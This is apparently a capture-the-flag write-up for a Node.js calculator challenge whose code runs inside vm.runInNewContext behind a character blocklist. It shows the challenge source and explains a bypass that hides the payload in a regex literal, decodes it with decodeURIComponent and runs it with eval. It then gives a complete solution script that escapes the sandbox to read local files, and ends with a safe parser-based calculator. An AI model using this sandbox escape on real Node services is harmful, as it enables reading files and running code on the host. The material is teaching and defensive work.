Source code
```
#!/usr/local/bin/node

// flag in ./flag.txt

const vm = require("vm");
const readline = require("readline");

const interface = readline.createInterface({
  input: process.stdin,
  output: process.stdout,
});

interface.question(
  "Welcome to CaaSio: Please Stop Edition! Enter your calculation:\n",
  function (input) {
    interface.close();
    if (
      input.length < 215 &&
      /^[\x20-\x7e]+$/.test(input) &&
      !/[.\[\]{}\s;`'"\\_<>?:]/.test(input) &&
      !input.toLowerCase().includes("import")
    ) {
      try {
        const val = vm.runInNewContext(input, {});
        console.log("Result:");
        console.log(val);
        console.log(
          "See, isn't the calculator so much nicer when you're not trying to hack it?"
        );
      } catch (e) {
        console.log("your tried");
      }
    } else {
      console.log(
        "Third time really is the charm! I've finally created an unhackable system!"
      );
    }
  }
);
```
Inside the sandbox we still have access to some handy built-in functions: `eval` and `decodeURIComponent`. Using `decodeURIComponent` lets us sidestep every sanitizing restriction except one: we cannot use quotes of any kind, so there is no obvious way to write a string literal.
This is the first key to the solution. A regexp literal can carry text, because adding a number to a regex coerces the regex to its source string:

```
1+/some text in regex/ === "1/some text in regex/"
```

Now we can use an attack template like this:

```
attack = `eval(decodeURIComponent(1+/2,${payload}%2f/))`
```

which produces the functional equivalent of

```
eval('1/2,${payload}//1')
```

but every banned symbol in the payload must be replaced by its percent-encoded value.

Step 2 is escaping from `vm.runInNewContext`. The sandbox object passed as the context is an ordinary host object, so `this.constructor.constructor` is the host realm's `Function` and code built with it runs with the host's `process`. An explanation of this technique can be found [here](https://thegoodhacker.com/posts/the-unsecure-node-vm-module/).

Solution
```
payload = `this.constructor.constructor('return process.mainModule.require("fs").readFileSync("./flag.txt","utf-8")')()`
payload = payload
  .replaceAll(".", "%2e")
  .replaceAll("'", "%27")
  .replaceAll('"', "%22")
  .replaceAll("_", "%5f")
  .replaceAll(" ", "%20")
  .replaceAll(">", "%3e")
  .replaceAll("[", "%5b")
  .replaceAll("]", "%5d")
  .replaceAll("/", "%2f")
attack = `eval(decodeURIComponent(1+/2,${payload}%2f/))`
console.log(attack)
```
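The root cause is that `vm.runInNewContext` is not a security boundary, so no character blocklist can make this calculator safe. As an added example (not from the challenge or this writeup), here is the defensive alternative: parse arithmetic with a small recursive-descent evaluator so untrusted input is never executed as JavaScript at all. The names `tokenize`, `parse`, `calc` and `isRejected` are my own.

```javascript
// Added example: a calculator with no JavaScript interpreter behind it.
// Only numbers, + - * / and parentheses are accepted; anything else is a
// SyntaxError, so there is no eval, no vm context and nothing to escape from.

function tokenize(src) {
  const tokens = [];
  let i = 0;
  while (i < src.length) {
    const c = src[i];
    if (c === " ") { i++; continue; }
    if ("+-*/()".includes(c)) { tokens.push({ op: c }); i++; continue; }
    const m = /^\d+(\.\d+)?/.exec(src.slice(i));
    if (!m) throw new SyntaxError(`unexpected character ${JSON.stringify(c)} at ${i}`);
    tokens.push({ num: Number(m[0]) });
    i += m[0].length;
  }
  return tokens;
}

function parse(tokens) {
  let pos = 0;
  const peek = () => tokens[pos];
  const expect = (op) => {
    const t = tokens[pos++];
    if (!t || t.op !== op) throw new SyntaxError(`expected ${op}`);
  };
  function expr() {               // expr := term (('+'|'-') term)*
    let v = term();
    while (peek() && (peek().op === "+" || peek().op === "-")) {
      const op = tokens[pos++].op, r = term();
      v = op === "+" ? v + r : v - r;
    }
    return v;
  }
  function term() {               // term := unary (('*'|'/') unary)*
    let v = unary();
    while (peek() && (peek().op === "*" || peek().op === "/")) {
      const op = tokens[pos++].op, r = unary();
      v = op === "*" ? v * r : v / r;
    }
    return v;
  }
  function unary() {              // unary := '-' unary | '(' expr ')' | number
    const t = tokens[pos++];
    if (!t) throw new SyntaxError("unexpected end of input");
    if (t.op === "-") return -unary();
    if (t.op === "(") { const v = expr(); expect(")"); return v; }
    if (t.num !== undefined) return t.num;
    throw new SyntaxError(`unexpected token ${t.op}`);
  }
  const v = expr();
  if (pos !== tokens.length) throw new SyntaxError("trailing input");
  return v;
}

const calc = (input) => parse(tokenize(input));
// true when the grammar rejects the input (e.g. the eval/regex template above)
const isRejected = (input) => { try { calc(input); return false; } catch (e) { return true; } };
```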